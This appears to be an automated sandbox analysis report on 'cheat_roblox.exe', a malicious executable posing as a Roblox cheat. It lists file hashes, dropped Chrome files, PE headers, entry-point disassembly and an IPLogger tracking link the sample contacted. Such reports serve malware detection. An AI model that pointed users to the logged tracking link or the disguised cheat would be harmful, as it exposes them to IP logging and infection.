                                                                            SSDEEP:49152:GB6BoH5sOI2CHusbKOdskuoHHVjcY94RNETO2WYA4oPToqnQ3dK5zuqvGKGxofFo:M67hlnVjcYGRNETO2WYA4oLoqnJuZI5
                                                                            MD5:477C17B6448695110B4D227664AA3C48
                                                                            SHA1:949FF1136E0971A0176F6ADEA8ADCC0DD6030F22
                                                                            SHA-256:CB190E7D1B002A3050705580DD51EBA895A19EB09620BDD48D63085D5D88031E
                                                                            SHA-512:1E267B01A78BE40E7A02612B331B1D9291DA8E4330DEA10BF786ACBC69F25E0BAECE45FB3BAFE1F4389F420EBAA62373E4F035A45E34EADA6F72C7C61D2302ED
                                                                            Malicious:true
                                                                            Antivirus:
                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:JSON data
                                                                            Category:dropped
                                                                            Size (bytes):1778
                                                                            Entropy (8bit):6.02086725086136
                                                                            Encrypted:false
                                                                            SSDEEP:48:p/hCdQAdJjRkakCi0LXjX9mqjW6JmfQkNWQzXXf2gTs:RtQ1aaxXrjW6JuQEWQKas
                                                                            MD5:3E839BA4DA1FFCE29A543C5756A19BDF
                                                                            SHA1:D8D84AC06C3BA27CCEF221C6F188042B741D2B91
                                                                            SHA-256:43DAA4139D3ED90F4B4635BD4D32346EB8E8528D0D5332052FCDA8F7860DB729
                                                                            SHA-512:19B085A9CFEC4D6F1B87CC6BBEEB6578F9CBA014704D05C9114CFB0A33B2E7729AC67499048CB33823C884517CBBDC24AA0748A9BB65E9C67714E6116365F1AB
                                                                            Malicious:false
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:ASCII text, with no line terminators
                                                                            Category:dropped
                                                                            Size (bytes):66
                                                                            Entropy (8bit):3.974403644129192
                                                                            Encrypted:false
                                                                            SSDEEP:3:SLVV8T+WSq2ykFDJp9qBn:SLVqZS5p0B
                                                                            MD5:D30A5BBC00F7334EEDE0795D147B2E80
                                                                            SHA1:78F3A6995856854CAD0C524884F74E182F9C3C57
                                                                            SHA-256:A08C1BC41DE319392676C7389048D8B1C7424C4B74D2F6466BCF5732B8D86642
                                                                            SHA-512:DACF60E959C10A3499D55DC594454858343BF6A309F22D73BDEE86B676D8D0CED10E86AC95ECD78E745E8805237121A25830301680BD12BFC7122A82A885FF4B
                                                                            Malicious:false
                                                                            Preview:1.c900ba9a2d8318263fd43782ee6fd5fb50bad78bf0eb2c972b5922c458af45ed
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:JSON data
                                                                            Category:dropped
                                                                            Size (bytes):145
                                                                            Entropy (8bit):4.595307058143632
                                                                            Encrypted:false
                                                                            SSDEEP:3:rR6TAulhFphifFooG+HhFFKS18CWjhXLXGPQ3TRpvF/FHddTcplFHddTcVYA:F6VlM5PpKS18hRIA
                                                                            MD5:BBC03E9C7C5944E62EFC9C660B7BD2B6
                                                                            SHA1:83F161E3F49B64553709994B048D9F597CDE3DC6
                                                                            SHA-256:6CCE5AD8D496BC5179FA84AF8AFC568EEBA980D8A75058C6380B64FB42298C28
                                                                            SHA-512:FB80F091468A299B5209ACC30EDAF2001D081C22C3B30AAD422CBE6FEA7E5FE36A67A8E000D5DD03A30C60C30391C85FA31F3931E804C351AB0A71E9A978CC0F
                                                                            Malicious:false
                                                                            Preview:{. "manifest_version": 2,. "name": "windows-mf-cdm",. "version": "1.0.2738.0",. "accept_arch": [. "x64",. "x86_64",. "x86_64h". ].}
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:JSON data
                                                                            Category:dropped
                                                                            Size (bytes):1796
                                                                            Entropy (8bit):6.030369721181362
                                                                            Encrypted:false
                                                                            SSDEEP:24:pZRj/flTT479GpqYNJpFTN+R7aoXaBOs9pbt5dWpuck0iXfkhApoXB2XktSqDhs:p/hcI1NJpFN+R7aka8s9pbwp+zpkntI
                                                                            MD5:4CE34645BA96EBAAFF71D8B9ED570881
                                                                            SHA1:7DD920E922A66E276CFE162B4D51D0EE862321FD
                                                                            SHA-256:8453F66B3179AB56365D2C053F73AD5F90CDDC344EA09F88CBA77D9199E1291D
                                                                            SHA-512:1F3E116B3DBAFCEAC4C8E0958431218281A6647F8BC8AFA742B2C759CD368A3A9551BEE284D5971DE004ABC88C810B82DF372BAA38AA549899D79B2460A9D493
                                                                            Malicious:false
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:data
                                                                            Category:dropped
                                                                            Size (bytes):7883519
                                                                            Entropy (8bit):6.572648868768043
                                                                            Encrypted:false
                                                                            SSDEEP:98304:zP9pZvIxJcGGgPFckavBTC0fxiR9AEosZWD:zFW/QZxiROPD
                                                                            MD5:F1F7280460CB0976FDBFBC9E809000EC
                                                                            SHA1:99A5AB5B99482A7ED596C9C664C2A1755B215D85
                                                                            SHA-256:A49478B4959707E94BAA235551FAE89089386CD962D906F78A36553E371F358C
                                                                            SHA-512:2A43B2B89506FC3D82CCC413A78F9A670D0B99838F990DC68B6B7A899E68A68D96734EADCCAA3EB4069898003B7574659FDD1D85AD11C89CB2C42CECD94B91A0
                                                                            Malicious:false
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:ASCII text, with no line terminators
                                                                            Category:dropped
                                                                            Size (bytes):66
                                                                            Entropy (8bit):3.85910606118318
                                                                            Encrypted:false
                                                                            SSDEEP:3:STAE4+g6KQXTKth2vaUDXHuIRQyTcn:SzghQDKSvaaX0yQ
                                                                            MD5:9AFC3C6A8D9349FCB25061F1A9BD2028
                                                                            SHA1:2569EDDE33E0F02C4D57A625DF0FB324856CEA86
                                                                            SHA-256:7C418C921DE2AF6C70D526A1EAE6A0F133E0D10F538B345A365C3FE2B3686CB2
                                                                            SHA-512:719E56123C5F9D134CBEF107AC4D595C07C3D623D29E3F39B8FD8983050ADAEE8C1AA7228B33A6EC9D8C44F4CDC6464A4B748BAD75E4A15EACD22F5EEC5387CB
                                                                            Malicious:false
                                                                            Preview:1.6eafa0a2352ea31bac3d85266c994edc453fc434eb11f2bab1445dea22c0ff69
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:JSON data
                                                                            Category:dropped
                                                                            Size (bytes):108
                                                                            Entropy (8bit):4.880870753312092
                                                                            Encrypted:false
                                                                            SSDEEP:3:rR6TAulhFphifF0AAGAR3CKG/w/VpKS1802Qc6vY:F6VlMT2C7Y/VUS1802Qc6A
                                                                            MD5:91B1C49B99FE2B26C28B2027A08CE05C
                                                                            SHA1:2BBF126EA07204A4877D777B358C6E6A327AB943
                                                                            SHA-256:41C41526EA9847C8157416F243FE23D4150FAC13075AE535371C06942C2CE770
                                                                            SHA-512:069B05CAEFC788303A6EB07CC3578A7AD080979653BE08E51B5BFD359DF158C2F12C587B3CEA3D26B62EA2504E5ED46A5EA64B5D72B08BE689A5CFF81C823C46
                                                                            Malicious:false
                                                                            Preview:{. "manifest_version": 2,. "name": "OnDeviceHeadSuggestENUS500000",. "version": "20240717.655735111.14".}
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:ASCII text
                                                                            Category:dropped
                                                                            Size (bytes):1558
                                                                            Entropy (8bit):5.11458514637545
                                                                            Encrypted:false
                                                                            SSDEEP:48:OBOCrYJ4rYJVwUCLHDy43HV713XEyMmZ3teTHn:LCrYJ4rYJVwUCHZ3Z13XtdUTH
                                                                            MD5:EE002CB9E51BB8DFA89640A406A1090A
                                                                            SHA1:49EE3AD535947D8821FFDEB67FFC9BC37D1EBBB2
                                                                            SHA-256:3DBD2C90050B652D63656481C3E5871C52261575292DB77D4EA63419F187A55B
                                                                            SHA-512:D1FDCC436B8CA8C68D4DC7077F84F803A535BF2CE31D9EB5D0C466B62D6567B2C59974995060403ED757E92245DB07E70C6BDDBF1C3519FED300CC5B9BF9177C
                                                                            Malicious:false
                                                                            Preview:// Copyright 2015 The Chromium Authors. All rights reserved..//.// Redistribution and use in source and binary forms, with or without.// modification, are permitted provided that the following conditions are.// met:.//.// * Redistributions of source code must retain the above copyright.// notice, this list of conditions and the following disclaimer..// * Redistributions in binary form must reproduce the above.// copyright notice, this list of conditions and the following disclaimer.// in the documentation and/or other materials provided with the.// distribution..// * Neither the name of Google Inc. nor the names of its.// contributors may be used to endorse or promote products derived from.// this software without specific prior written permission..//.// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS.// "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT.// LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR.// A PARTICULAR
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:JSON data
                                                                            Category:dropped
                                                                            Size (bytes):1864
                                                                            Entropy (8bit):5.993417646222111
                                                                            Encrypted:false
                                                                            SSDEEP:48:p/hUI1JfE4hAdIs7akUEQNV3N8kIL8F64leu38k7ObMARcqk:RnqOQIs7azN/8n4leus+cMASqk
                                                                            MD5:2295CEA75E046B34E7209F41B03CEC14
                                                                            SHA1:1099DCE991021E31A33BD12106E4FD23AA763D33
                                                                            SHA-256:B2EDA3181D68EFAA7AC3EE4DAC3207F922CCA956186A7AFBFB8E88A64E84BB3F
                                                                            SHA-512:FBEAA1FFF2FBAFD6FD3A5076DDC4F5DAC024EAB72C3061BE3F32EB5D6F8883DF028254824790A0471FFB57D0314DB733F3AE9E2E8CD423B78EAF5D847C2CF4B7
                                                                            Malicious:false
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:ASCII text, with no line terminators
                                                                            Category:dropped
                                                                            Size (bytes):66
                                                                            Entropy (8bit):3.967367379785099
                                                                            Encrypted:false
                                                                            SSDEEP:3:Sc4EddulfeAQQgBD4RdNRWS3Ug5:Sc4EddulfeAQtDsfVEi
                                                                            MD5:D981AE71ED66833759DDCCEC52FB948A
                                                                            SHA1:E0DB4693A7B1BB80C9D3DE020273728F32389574
                                                                            SHA-256:679A53419459DF7FE54CCC32F752D38A15CD6856FFFC9086C29EF7B7D8E2C7CB
                                                                            SHA-512:3F86B3363BC1A906C899035CDE4E8A89828EE274C17B92C6F88CEAB912FB043B5544925B33914DF8452F52DB0802427B03D2F674500A8340609FCB54026F997B
                                                                            Malicious:false
                                                                            Preview:1.90748cb88f02e4d2a3ff9262e55bedfdb57069486d4c383744c4bdbe3c7ea7ca
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:JSON data
                                                                            Category:dropped
                                                                            Size (bytes):85
                                                                            Entropy (8bit):4.424014792499492
                                                                            Encrypted:false
                                                                            SSDEEP:3:rR6TAulhFphifFCmMARWHJqS1iLBRvY:F6VlM8aRWpqS1iLBW
                                                                            MD5:9A094D744241B990256BD73A9F0DE35B
                                                                            SHA1:0B903320B690921724C04EB0A97C92E5F1A446A4
                                                                            SHA-256:A018F1695956AAEB88D70F496D3E115C47E49931DA7AE48B0DF3D10238CC1C5A
                                                                            SHA-512:38AF8E23CC8CE4825CF974CA55144E8907C65091F411CED19E650CCE164CC9F1B4F8D854F4506C70377899615AB570609E8236633F2211C7328E462EB0043C4D
                                                                            Malicious:false
                                                                            Preview:{. "manifest_version": 2,. "name": "First Party Sets",. "version": "2024.7.24.0".}
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:JSON data
                                                                            Category:dropped
                                                                            Size (bytes):9482
                                                                            Entropy (8bit):4.628404350796629
                                                                            Encrypted:false
                                                                            SSDEEP:96:Mon4mvCSqX1gs1blbw/BNKLcxbdmf56MFJtRTGXvcxN43uP+8qJq:v5CSqlKBkIVmtRTGXvcxBsq
                                                                            MD5:5BE545A21EBEEA747EAA08C476DEC2C7
                                                                            SHA1:3F6670F5C43147FA3DE5E768CF959DE2DAA34053
                                                                            SHA-256:B7C919CE2670AC0D8966E83AE141AE1B30EE8AD68581D42D92AC1C09BB161BED
                                                                            SHA-512:18DBC4779704D730584D02B4A5C2D1B9089F2503CB6DC847DA8128EA2215C0D70965CB3384934F5657C22F26DD68496EFAD05FD4AC95105BED7F3DB6351B24C6
                                                                            Malicious:false
                                                                            Preview:{"primary":"https://bild.de","associatedSites":["https://welt.de","https://autobild.de","https://computerbild.de","https://wieistmeineip.de"],"serviceSites":["https://www.asadcdn.com"]}.{"primary":"https://blackrock.com","associatedSites":["https://blackrockadvisorelite.it","https://cachematrix.com","https://efront.com","https://etfacademy.it","https://ishares.com"]}.{"primary":"https://cafemedia.com","associatedSites":["https://cardsayings.net","https://nourishingpursuits.com"]}.{"primary":"https://caracoltv.com","associatedSites":["https://noticiascaracol.com","https://bluradio.com","https://shock.co","https://bumbox.com","https://hjck.com"]}.{"primary":"https://carcostadvisor.com","ccTLDs":{"https://carcostadvisor.com":["https://carcostadvisor.be","https://carcostadvisor.fr"]}}.{"primary":"https://citybibleforum.org","associatedSites":["https://thirdspace.org.au"]}.{"primary":"https://cognitiveai.ru","associatedSites":["https://cognitive-ai.ru"]}.{"primary":"https://elpais.com.uy","
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:PNG image data, 64 x 64, 8-bit/color RGBA, non-interlaced
                                                                            Category:downloaded
                                                                            Size (bytes):2833
                                                                            Entropy (8bit):7.876846206921263
                                                                            Encrypted:false
                                                                            SSDEEP:48:Kw15hc/Pj2itdgjeVVO/SzBdCvhaHAlJX7XnF/HDoSH8T78atjZeHMBx/F/WssM:J15hc/Pj2mdgjMjusgl5XFD3MoIx9eg
                                                                            MD5:18C023BC439B446F91BF942270882422
                                                                            SHA1:768D59E3085976DBA252232A65A4AF562675F782
                                                                            SHA-256:E0E71ACEF1EFBFAB69A1A60CD8FADDED948D0E47A0A27C59A0BE7033F6A84482
                                                                            SHA-512:A95AD7B48596BC0AF23D05D1E58681E5D65E707247F96C5BC088880F4525312A1834A89615A0E33AEA6B066793088A193EC29B5C96EA216F531C443487AE0735
                                                                            Malicious:false
                                                                            URL:https://cdn.iplogger.org/favicon.ico
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:GIF image data, version 87a, 31 x 31
                                                                            Category:dropped
                                                                            Size (bytes):445
                                                                            Entropy (8bit):7.051559084988302
                                                                            Encrypted:false
                                                                            SSDEEP:6:tj+cYUFqb9Oq2EWxiWlb+hKI526WogYAGJe9UCZE12REqtVv6n:tqeqZF3WxiHKI5KopAMQUD10EqtVv6
                                                                            MD5:1BD6EB140EC5E09AF54808BCE2BE74BE
                                                                            SHA1:00746108650919B88014CE35AABF72B0F20B2046
                                                                            SHA-256:3E13369E5C528A4598007330A7D572DADD181E268D0CF87BA7B62FD7668597F8
                                                                            SHA-512:FA58EB9D8DB6819BCD39EC73089942D7F16CA602322E3EFA592A3418FB735A87DF9FD5388830F8E1E699CB5457234626F2B09DACEC83E265F300CE19AA907DBE
                                                                            Malicious:false
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:PNG image data, 64 x 64, 8-bit/color RGBA, non-interlaced
                                                                            Category:dropped
                                                                            Size (bytes):2833
                                                                            Entropy (8bit):7.876846206921263
                                                                            Encrypted:false
                                                                            SSDEEP:48:Kw15hc/Pj2itdgjeVVO/SzBdCvhaHAlJX7XnF/HDoSH8T78atjZeHMBx/F/WssM:J15hc/Pj2mdgjMjusgl5XFD3MoIx9eg
                                                                            MD5:18C023BC439B446F91BF942270882422
                                                                            SHA1:768D59E3085976DBA252232A65A4AF562675F782
                                                                            SHA-256:E0E71ACEF1EFBFAB69A1A60CD8FADDED948D0E47A0A27C59A0BE7033F6A84482
                                                                            SHA-512:A95AD7B48596BC0AF23D05D1E58681E5D65E707247F96C5BC088880F4525312A1834A89615A0E33AEA6B066793088A193EC29B5C96EA216F531C443487AE0735
                                                                            Malicious:false
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:GIF image data, version 87a, 31 x 31
                                                                            Category:downloaded
                                                                            Size (bytes):445
                                                                            Entropy (8bit):7.051559084988302
                                                                            Encrypted:false
                                                                            SSDEEP:6:tj+cYUFqb9Oq2EWxiWlb+hKI526WogYAGJe9UCZE12REqtVv6n:tqeqZF3WxiHKI5KopAMQUD10EqtVv6
                                                                            MD5:1BD6EB140EC5E09AF54808BCE2BE74BE
                                                                            SHA1:00746108650919B88014CE35AABF72B0F20B2046
                                                                            SHA-256:3E13369E5C528A4598007330A7D572DADD181E268D0CF87BA7B62FD7668597F8
                                                                            SHA-512:FA58EB9D8DB6819BCD39EC73089942D7F16CA602322E3EFA592A3418FB735A87DF9FD5388830F8E1E699CB5457234626F2B09DACEC83E265F300CE19AA907DBE
                                                                            Malicious:false
                                                                            URL:https://counter.yadro.ru/hit?q;t38.6;r;s1280*1024*24;uhttps%3A//2no.co/redirect-2;hBranded%20Short%20Domain;0.07021634166148738
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1460), with CRLF, CR, LF line terminators
                                                                            Category:downloaded
                                                                            Size (bytes):9909
                                                                            Entropy (8bit):5.402425739040007
                                                                            Encrypted:false
                                                                            SSDEEP:192:DLlw+00cv13xV1cSHYu+zogDwIIhWp6psOsW4rqSxVEGz5R2WxSi1yz:D5w+Pcv13T1FH0fkIIm6QXxzP20u
                                                                            MD5:B7200222968BE4C34BD8C8902D298EC9
                                                                            SHA1:E197DCA77C595D0BD625A65CEF2B19A8625012CF
                                                                            SHA-256:0B2479797BDEA905C6E9DFEA1B675D8D99263EFFAF2206653600E3C8BC1EEAF8
                                                                            SHA-512:BAC81BCF0D3F47BC3A98FA501934BC331EAF6317CE682EEC5113A8D1B4249FEA7E70446F8F63C5EEF0B3A64FA74D979AC7F16D440D89BD643B80E03C8D2A2909
                                                                            Malicious:false
                                                                            URL:https://2no.co/24RXx6
                                                                            Preview:<!DOCTYPE html>.<html lang="US" class="html">.<head>..<title>Branded Short Domain</title>..<meta http-equiv="content-type" content="text/html; charset=utf-8" />..<meta http-equiv="X-UA-Compatible" content="IE=edge">.. <meta name="viewport" content="width=device-width, initial-scale=1, user-scalable=yes">..<meta name="author" content="Deorg" />..<meta name="copyright" content="Copyright . IPLogger 2010-2024" />..<meta name="robots" content="index, follow" />..<meta name="revisit-after" content="7 days" />..<meta name="keywords" content="shortener, iplogger, shortlink, url, domain" />..<meta name="description" content="" />...<link rel="shortcut icon" href="https://cdn.iplogger.org/favicon.ico" type="image/x-icon" />...<meta property="og:image" content="https://cdn.iplogger.org/redirect/brand.png" />..<meta property="og:description" content="2no.co is a Branded Short Domain..." />..<meta property="fb:app_id" content="232115388491569" />..<meta property="og:image:width" content="285"
                                                                            File type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                            Entropy (8bit):7.909822900338073
                                                                            TrID:
                                                                            • Win64 Executable GUI (202006/5) 92.65%
                                                                            • Win64 Executable (generic) (12005/4) 5.51%
                                                                            • Generic Win/DOS Executable (2004/3) 0.92%
                                                                            • DOS Executable Generic (2002/1) 0.92%
                                                                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                            File name:cheat_roblox.exe
                                                                            File size:2'675'335 bytes
                                                                            MD5:d49b1a211ce49bed3e766471501819c6
                                                                            SHA1:ed8f8b0d45ad556115c14a00247c080fa82d56e9
                                                                            SHA256:1673b4f5f2d5ae3e3d2c5816534bf904ed1d2653b4a40bbb2a320231eca8259a
                                                                            SHA512:2a0ec111c39ed2d5e02555a18a94f84bb546d1fc4f827ddeb24709b9b86259318611626a578918c5d8e60a5667e774c0d36241b6b668afb466a8806d37c2b7d2
                                                                            SSDEEP:49152:1Djlabwz97DQNxlq9fFQXLkL9g+/kW/4JNe0OL108Jgwya3fj8kSbn17:Zqw5skLZbaWL108JgwnvS5
                                                                            TLSH:48C5120AF3A509F8E073E57889474906F67A3C1A13319BCF13A5556B2F673A1CE2E352
                                                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......$.2.`.\.`.\.`.\..y..h.\..y....\..y..m.\.....b.\...X.r.\..._.j.\...Y.Y.\.i...i.\.i...b.\.i...g.\.`.].C.\...Y.R.\...\.a.\.....a.\
                                                                            Icon Hash:1515d4d4442f2d2d
                                                                            Entrypoint:0x140032ee0
                                                                            Entrypoint Section:.text
                                                                            Digitally signed:false
                                                                            Imagebase:0x140000000
                                                                            Subsystem:windows gui
                                                                            Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                                            DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                                                                            Time Stamp:0x66409723 [Sun May 12 10:17:07 2024 UTC]
                                                                            TLS Callbacks:
                                                                            CLR (.Net) Version:
                                                                            OS Version Major:5
                                                                            OS Version Minor:2
                                                                            File Version Major:5
                                                                            File Version Minor:2
                                                                            Subsystem Version Major:5
                                                                            Subsystem Version Minor:2
                                                                            Import Hash:b1c5b1beabd90d9fdabd1df0779ea832
                                                                            Instruction
                                                                            dec eax
                                                                            sub esp, 28h
                                                                            call 00007FB81CC4F3F8h
                                                                            dec eax
                                                                            add esp, 28h
                                                                            jmp 00007FB81CC4ED8Fh
                                                                            int3
                                                                            int3
                                                                            dec eax
                                                                            mov eax, esp
                                                                            dec eax
                                                                            mov dword ptr [eax+08h], ebx
                                                                            dec eax
                                                                            mov dword ptr [eax+10h], ebp
                                                                            dec eax
                                                                            mov dword ptr [eax+18h], esi
                                                                            dec eax
                                                                            mov dword ptr [eax+20h], edi
                                                                            inc ecx
                                                                            push esi
                                                                            dec eax
                                                                            sub esp, 20h
                                                                            dec ebp
                                                                            mov edx, dword ptr [ecx+38h]
                                                                            dec eax
                                                                            mov esi, edx
                                                                            dec ebp
                                                                            mov esi, eax
                                                                            dec eax
                                                                            mov ebp, ecx
                                                                            dec ecx
                                                                            mov edx, ecx
                                                                            dec eax
                                                                            mov ecx, esi
                                                                            dec ecx
                                                                            mov edi, ecx
                                                                            inc ecx
                                                                            mov ebx, dword ptr [edx]
                                                                            dec eax
                                                                            shl ebx, 04h
                                                                            dec ecx
                                                                            add ebx, edx
                                                                            dec esp
                                                                            lea eax, dword ptr [ebx+04h]
                                                                            call 00007FB81CC4E213h
                                                                            mov eax, dword ptr [ebp+04h]
                                                                            and al, 66h
                                                                            neg al
                                                                            mov eax, 00000001h
                                                                            sbb edx, edx
                                                                            neg edx
                                                                            add edx, eax
                                                                            test dword ptr [ebx+04h], edx
                                                                            je 00007FB81CC4EF23h
                                                                            dec esp
                                                                            mov ecx, edi
                                                                            dec ebp
                                                                            mov eax, esi
                                                                            dec eax
                                                                            mov edx, esi
                                                                            dec eax
                                                                            mov ecx, ebp
                                                                            call 00007FB81CC50F37h
                                                                            dec eax
                                                                            mov ebx, dword ptr [esp+30h]
                                                                            dec eax
                                                                            mov ebp, dword ptr [esp+38h]
                                                                            dec eax
                                                                            mov esi, dword ptr [esp+40h]
                                                                            dec eax
                                                                            mov edi, dword ptr [esp+48h]
                                                                            dec eax
                                                                            add esp, 20h
                                                                            inc ecx
                                                                            pop esi
                                                                            ret
                                                                            int3
                                                                            int3
                                                                            int3
                                                                            dec eax
                                                                            sub esp, 48h
                                                                            dec eax
                                                                            lea ecx, dword ptr [esp+20h]
                                                                            call 00007FB81CC3D7A3h
                                                                            dec eax
                                                                            lea edx, dword ptr [00025747h]
                                                                            dec eax
                                                                            lea ecx, dword ptr [esp+20h]
                                                                            call 00007FB81CC4FFF2h
                                                                            int3
                                                                            jmp 00007FB81CC561D4h
                                                                            int3
                                                                            int3
                                                                            int3
                                                                            int3
                                                                            int3
                                                                            int3
                                                                            Programming Language:
                                                                            • [ C ] VS2008 SP1 build 30729
                                                                            • [IMP] VS2008 SP1 build 30729
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x597a0 | 0x34 | .rdata
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x597d4 | 0x50 | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x70000 | 0xe3bc | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x6a000 | 0x306c | .pdata
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x7f000 | 0x970 | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x536c0 | 0x54 | .rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x53780 | 0x28 | .rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x4b3f0 | 0x140 | .rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x48000 | 0x508 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x588bc | 0x120 | .rdata
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x4676e | 0x46800 | f06bb06e02377ae8b223122e53be35c2 | False | 0.5372340425531915 | data | 6.47079645411382 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x48000 | 0x128c4 | 0x12a00 | 2de06d4a6920a6911e64ff20000ea72f | False | 0.4499003775167785 | data | 5.273999097784603 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0x5b000 | 0xe75c | 0x1a00 | 0dbdb901a7d477980097e42e511a94fb | False | 0.28275240384615385 | data | 3.2571023907881185 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.pdata | 0x6a000 | 0x306c | 0x3200 | b0ce0f057741ad2a4ef4717079fa34e9 | False | 0.483359375 | data | 5.501810413666288 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.didat | 0x6e000 | 0x360 | 0x400 | 1fcc7b1d7a02443319f8fcc2be4ca936 | False | 0.2578125 | data | 3.0459938492946015 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
_RDATA | 0x6f000 | 0x15c | 0x200 | 3f331ec50f09ba861beaf955b33712d5 | False | 0.408203125 | data | 3.3356393424384843 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc | 0x70000 | 0xe3bc | 0xe400 | 1b279dad3e3d77fcdfb269a130bf474b | False | 0.6334121436403509 | data | 6.778407783727912 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x7f000 | 0x970 | 0xa00 | 77a9ddfc47a5650d6eebbcc823e39532 | False | 0.52421875 | data | 5.336289720085303 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
PNG | 0x70674 | 0xb45 | PNG image data, 93 x 302, 8-bit/color RGB, non-interlaced | | | 1.0027729636048528
PNG | 0x711bc | 0x15a9 | PNG image data, 186 x 604, 8-bit/color RGB, non-interlaced | | | 0.9363390441839495
RT_ICON | 0x72768 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 256, resolution 2834 x 2834 px/m, 256 important colors | | | 0.47832369942196534
RT_ICON | 0x72cd0 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 1024, resolution 2834 x 2834 px/m, 256 important colors | | | 0.5410649819494585
RT_ICON | 0x73578 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 2304, resolution 2834 x 2834 px/m, 256 important colors | | | 0.4933368869936034
RT_ICON | 0x74420 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1024, resolution 2834 x 2834 px/m | | | 0.5390070921985816
RT_ICON | 0x74888 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4096, resolution 2834 x 2834 px/m | | | 0.41393058161350843
RT_ICON | 0x75930 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9216, resolution 2834 x 2834 px/m | | | 0.3479253112033195
RT_ICON | 0x77ed8 | 0x3d71 | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | | | 0.9809269502193401
RT_DIALOG | 0x7bc4c | 0x2ba | data | | | 0.5286532951289399
RT_DIALOG | 0x7bf08 | 0x13a | data | | | 0.6560509554140127
RT_DIALOG | 0x7c044 | 0xf2 | data | | | 0.71900826446281
RT_DIALOG | 0x7c138 | 0x14a | data | | | 0.6
RT_DIALOG | 0x7c284 | 0x314 | data | | | 0.47588832487309646
RT_DIALOG | 0x7c598 | 0x24a | data | | | 0.6279863481228669
RT_STRING | 0x7c7e4 | 0x1fc | data | | | 0.421259842519685
RT_STRING | 0x7c9e0 | 0x246 | data | | | 0.41924398625429554
RT_STRING | 0x7cc28 | 0x1a6 | data | | | 0.514218009478673
RT_STRING | 0x7cdd0 | 0xdc | data | | | 0.65
RT_STRING | 0x7ceac | 0x470 | data | | | 0.3873239436619718
